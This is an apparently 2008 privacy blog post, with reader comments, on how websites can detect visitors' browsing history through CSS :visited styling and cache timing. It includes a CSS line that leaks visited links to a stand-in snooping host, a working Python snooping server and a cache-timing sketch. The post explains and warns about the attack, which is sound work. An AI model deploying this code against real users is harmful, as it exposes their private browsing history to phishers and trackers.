
There Is No Privacy #1: Snooping Browsing History through HTML

Unless you have installed a couple of specific firefox extensions to protect yourself, the owners of any website you visit can tell whether you have visited any other website.

It has been known since 2006 that it is possible for any website to query whether you have visited any of a list of other websites, without even having to use javascript. One way to do this relies on the fact that CSS (the style sheet language used by virtually every website) allows a website to specify a different color or background image for a given link depending on whether that link has been visited before. By specifying a url on the snooping host as the background of a visited link, a snooping website can determine whether you have visited any given link, as demonstrated by this code snippet from the above page:

    <style type="text/css">
      /* the placeholder url below would point at the snooping host; the
         browser only fetches it if the link counts as visited */
      #foo:visited { background: url(http://snooper.example.com/log?link=foo); }
    </style>

    <a id="foo" href="http://www.somebank.example/"></a>

To watch this attack in action, click on the ‘View all sites of interest’ link on the right-hand side of this page by Markus Jakobsson, Tom N. Jagatic, and Sid Stamm at Indiana University. The authors of the page specifically suggest that this sort of attack could be used by phishers to figure out which bank to emulate to fool a user into logging into a fake bank page, but there are any number of other ways to use this information. Felten and Schneider have written about a similar attack, using cache timing, that likewise exposes a user’s browsing history.

Neither the link-background attack nor the cache-timing attack relies on javascript, the source of a large number of privacy attacks. This independence from javascript makes the attacks particularly effective, since one common (though highly inconvenient) method of securing a browser is to turn off javascript support; even those who choose to turn off javascript are not safe from these attacks. There are firefox extensions to protect against both attacks, but they are not widely used. The developers of the core firefox browser have chosen not to include the code from those extensions in the base browser, even though the attack has been well known among security geeks for a couple of years, with the result that the vast majority of users remain vulnerable. The end result is that, unless you use firefox and install the above extensions, or periodically purge your browser history, any website you visit can tell whether you have visited any other website.
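To make the mechanics concrete, here is a rough sketch in Python of what a snooping server could look like (the probed site list, URLs, and endpoint names are hypothetical illustrations, not taken from the Indiana demo's actual code):

```python
# Sketch of the HTML-only history snoop. The served page styles each
# probed link so that its :visited background is an image on this server;
# the browser only fetches that image for links the user has actually
# visited, so each hit on /log reveals one visited site.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

PROBED_SITES = {  # link id -> URL to test against the visitor's history
    "bank1": "http://www.somebank.example/",
    "bank2": "http://www.otherbank.example/",
}

visited = set()  # link ids whose :visited background got requested


def attack_page():
    """Build the probe page: one styled, invisible link per probed site."""
    css = "".join(
        f"#{lid}:visited {{ background: url(/log?link={lid}); }}\n"
        for lid in PROBED_SITES
    )
    links = "".join(
        f'<a id="{lid}" href="{url}"></a>\n' for lid, url in PROBED_SITES.items()
    )
    return f"<html><head><style>{css}</style></head><body>{links}</body></html>"


class Snoop(BaseHTTPRequestHandler):
    def do_GET(self):
        parsed = urlparse(self.path)
        if parsed.path == "/log":
            # a request here means the browser considered this link visited
            visited.add(parse_qs(parsed.query)["link"][0])
            self.send_response(204)
            self.end_headers()
        else:
            body = attack_page().encode()
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(body)


# To run the sketch: HTTPServer(("", 8000), Snoop).serve_forever()
```

Note that the page needs no script at all: the "measurement" is just the presence or absence of an image request in the server's log.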

Update: The above extensions evidently don’t even work with firefox 3.0, though firefox 3.1 is reported to have a configuration setting (not exposed in the UI) that blocks the visited-link color by turning off the visited-link feature altogether.

{ 6 } Comments

  1. Hugh McNally | November 21, 2008 at 2:15 pm | Permalink

    Actually, to watch this attack in action, you need to visit…

    …and allow the server-side component to do the analysis in question. The alarmism of this post is understandable; it should be tempered by the fact that the phisher needs to generate a specific list of URLs and run the exploit against that list, thus coming up with a subset of his source list. The source list would be easy enough to generate, though.

    > Neither the link-background attack nor the cache-timing attack relies on javascript

    This is wrong. To illustrate, visit the above URL with JS turned off; it will tell you to turn it on to get phishing results. This exploit examines how long it takes to retrieve a style sheet; if the time is negligible, the phisher can assume that the browser has that information cached and, therefore, that the user has visited site X. Measuring time on the client side requires a client-side technology (the JS code).

    The exploit is described in some detail by the University of Illinois researchers. In that write-up, they relate how researchers have “described a timing-based attack that made it possible to determine (with some statistically quantifiable certainty) whether a given user had visited a given site or not – simply by determining the retrieval times of consecutive URL calls in a segment of HTTP code.”

    This blog posting should be revised to reflect the facts of the exploit. No doubt, the author visited the “result link” that had been sent to him/her, saw the results, said “hey, I’ve visited these sites!” and wrote this post. I did the same, and briefly thought the same.

  2. hal | November 21, 2008 at 3:20 pm | Permalink

    Hi Hugh,

    Thanks for the comments and the fixed link for the demonstration. I hadn’t realized they were generating session specific links for that demo. I think you may be thinking of the bank widget demonstration on the main page of the indiana site. The more interesting demo that I was trying (and failing!) to link to is the one linked by the ‘view all sites of interest’ link under the banking widget.

    I state clearly in the post that the attacks make it “possible for any website to query whether you have visited any of a list of other websites.” I’m not sure how to state any more clearly that the exploit has to run against a list of sites.

    The alarmism in the post is intentional, though the ‘#1’ part of the title is supposed to hint that there will be more posts in the future arguing that the lack of privacy is composed of a number of these sorts of privacy invasions. In fact, a large majority of web users have no idea, and would be alarmed to learn, that any given site they visit can tell whether or not they have visited youporn, alcoholics anonymous, or a gambling site. And this is just one of many such holes in expected privacy that are just sitting around with either no apparent solution or no one with the power interested in fixing them.

    There are versions of both attacks that work with javascript, but there are also versions of both that work without javascript.

    Which part of the visited-link attack html included in the post requires javascript? In fact, if you turn off javascript and click on the ‘view all sites of interest’ link on the right of the page, you’ll see that they still have the list of sites you’ve visited. They just happened to be using javascript to display the banking widget on the first page. The html version of the attack itself just relies on loading the background images for the visited links and logging the resulting hits on the server hosting the images.

    Likewise, if you read the paper by Felten and Schneider you’ll see that they talk about how to perform the attack without javascript:

    Java and JavaScript provide the most accurate means of measuring access time, but the attacker can get a sufficiently accurate measurement even if Java and JavaScript are disabled. This is done by writing a Web page that loads three files in sequence:

    1. a dummy file on the attacker’s site,
    2. the file whose access time is to be measured, and
    3. another dummy file on the attacker’s site.

    The attacker’s Web server can record the time at which it receives requests 1 and 3; subtracting yields an approximation to the time required to perform step 2. (We omit the straightforward but tedious details of how to write HTML that causes popular browsers to make serialized accesses to files.)
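The server-side arithmetic in that recipe is tiny. Here is a rough sketch in Python of the attacker's half (the paths, log structure, and cache threshold are illustrative assumptions, not anything from the paper or the demo):

```python
# Sketch of the server side of the non-javascript cache-timing attack.
# The attack page loads, in order: /dummy1 (on the attacker's server),
# the probed file (on the target site), then /dummy2 (attacker's again).
# The attacker never sees request 2, but the gap between the two dummy
# requests approximates how long the probed file took to load.
CACHE_THRESHOLD = 0.05  # seconds; picking this well is the hard part

request_log = {}  # path -> arrival time, as recorded by the web server


def record(path, arrival_time):
    """Stand-in for the web server noting when a request arrived."""
    request_log[path] = arrival_time


def probed_file_was_cached():
    """True if the probed file loaded fast enough to have been cached,
    which suggests the user has visited the target site before."""
    elapsed = request_log["/dummy2"] - request_log["/dummy1"]
    return elapsed < CACHE_THRESHOLD


# Example: both dummy requests arriving almost together implies the
# probed file in between came out of the browser cache.
record("/dummy1", 100.000)
record("/dummy2", 100.012)
```

The threshold is where the "statistically quantifiable certainty" from the quoted paper comes in: real network jitter forces the attacker to calibrate it per visitor.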

  3. Hugh McNally | November 21, 2008 at 3:57 pm | Permalink

    Thank you for including more technical details in your reply. I think you’ll agree that the mere existence of the code snippet at the top of the original post wouldn’t do much of anything unless the time it took to load those assets was measured by some mechanism.

    I indeed was referring to the very same proof of concept page you cited (or wanted to cite). Believe me, I’m with you in wanting to flush out the bad guys and their evil ways; your original post didn’t really address the “how” part of that. I was unaware of this type of exploit before I read this post.

    I acknowledge the server side possibility of this exploit (thanks for expanding my mind), but it seems like it would be noticeable to the end user (probably using a META REFRESH of the page). This could no doubt be crafted to look normal to an average website user, though. My gut feeling is, though, that the U of I proof of concept page uses JS for both the “illustrative example” and the link-through beneath it to the “big list.”

    Do you know of a proof of concept page for the server-side version of this exploit? I’d like to try it out!

  4. hal | November 21, 2008 at 4:02 pm | Permalink

    The attack doesn’t require a meta refresh — the second page is just for displaying the results. The server gets the data after the first page is loaded.

    The U of I page is a proof of concept of the non-javascript version of the attack. There’s no gut feeling involved — look at the source for the page and you’ll see exactly one line of lonely javascript loading the bank icon. One of the shocking parts about this attack is how trivially easy it is.

    Try this:

    * turn off javascript in your browser
    * load the u of i page
    * click on the ‘view all sites of interest’ link

    You’ll see the list of sites you’ve visited in its full glory, without any javascript.

  5. Hugh McNally | November 21, 2008 at 5:07 pm | Permalink

    The visit to the proof of concept page is building the next page and then linking to it, which would explain the unique key at the end of the URL. Appears to be done in an invisible IFRAME. I hate it when technology is used for evil.

    Just for fun…

    This looks like the attack, and it does have a 5 second META REFRESH based delay in it (which you never see, since it’s in an invisible frame). You can run it solo for even more fun…

    First the timing analysis, then a status report with some JavaScript to populate the “banking scheme” square of the first proof of concept page.

    Well, even if my technical analysis is still a little off, this has been an interesting and educational experience. The underlying theme is “crap that happens without the user’s consent or knowledge.” Maybe the next thing to start being cranky about with web client software developers is invisible frames…

  6. webthoughts | December 4, 2008 at 4:05 pm | Permalink

    For most sites I visit, I don’t care about privacy.

    But sometimes I do.

    Obviously banking sites and e-stores have issues with stolen credit card data and personal account info.

    Other sites raise privacy concerns, such as adult content and the kinds of personal preferences that most people would not want made public.

    But for most of us “Joe averages,” it’s no big deal outside of our sphere of contacts.

    My concern is with institutions and black (invisible) market forces.

    The fact is that skilled hackers are everywhere, from the 13-year-old next door (or in the next room!) to the high-end cyber-criminals. They can elude all but the best security teams because of their sheer numbers. They can enter almost any computer system and never be caught. The best that can be expected is that the security gets updated on that site. But even in the best case, the intruder has more than one way back in and can return at will.

    The fact is there is not an endless amount of money and personnel to relentlessly scrutinize each and every breach.

    So almost no one is ever caught.

    This leads to a sense of invincibility among those doing these things.

    Imagine if laws against rape were not enforced and that was common knowledge; do you think the crime would skyrocket, or just go up a little?

    Why not a more secure sub-space that does not allow the open, do-anything-the-mind-can-imagine HTML/XML/javascript world to run on both the servers and the client side?

    Have code that forbids “invisible frames” and the like on both the client and the host for secure environments.

    Automatic logging of anomalies on the host side, with law enforcement involved in parallel with the host IT staff, both to close the technology’s holes and to shorten the delay in identifying the perpetrators. Make a law that corporations must disclose breaches to law enforcement in real time.
    Do not leave it to “management” to decide and weigh the damage-control and hassle overhead costs… this is how we got here. Delay breeds criminals through the perceived or real impression of invincibility.

    Look how long it takes to catch mass spammers, and they are not exactly in stealth mode.

    Hold those people accountable financially.

    Holding spammers accountable for the electrical costs imposed on ISPs and server farms alone would kill the spam business model, to say nothing of the lost time of IT folks playing the chess game with these people, or the end users and their wasted time and frustration.

    There is no way to make these people pay the total cost of lost productivity, time, and trouble.

    Imagine if all of it (the spam-to-black-market operations, the IT staff time and cost, and the end users’ lost time and lost opportunity) were focused on things that have value to society. How much better off would we be?

    Could this alone have produced enough wealth and taxes to have paid off the national debt?

    I bet it would if this cancer had never started.

    Fast response in catching this stuff is key to reversing this total waste of human value.
    When people think they can get away with it, they will continue to do it.
    Yes, this will take a massive infusion of resources, but it will have a huge payoff when it is crushed.

    There is a whole ecosystem of internet cancer that is systemic. Everyone involved thinks they are not that bad and are only doing something “grey at the fringes,” failing to realize they are a key part of the e-cancer.